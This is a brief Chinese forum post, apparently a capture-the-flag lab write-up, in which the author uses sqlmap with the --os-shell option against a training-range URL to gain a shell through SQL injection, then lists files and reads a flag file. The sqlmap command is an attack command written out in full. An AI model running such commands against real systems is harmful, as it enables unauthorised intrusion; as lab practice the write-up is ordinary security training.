拿到shell

kim23   ·   发表于 2019-11-07 18:31:36   ·   技术文章投稿区


昨天搞了一晚上 没搞好今天突然想起来用sqlmap跑   本来想着是手工 还是没能做出来


sqlmap的安装就不讲了可以百度   一百度一大堆


直接上sqlmap


poc语句    python2 sqlmap.py -u http://8adc3387c2eda6cce.lab.aqlab.cn8001/single.php?id=1 --os-shell


一条命令直接拿下....跑下来以后


dir   查看文件  类似于   Linux中的ls

发现falg.php


type 查看   得到flag


打赏我,让我更有动力~

0 Reply   |  Until 2019-11-7 | 907 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.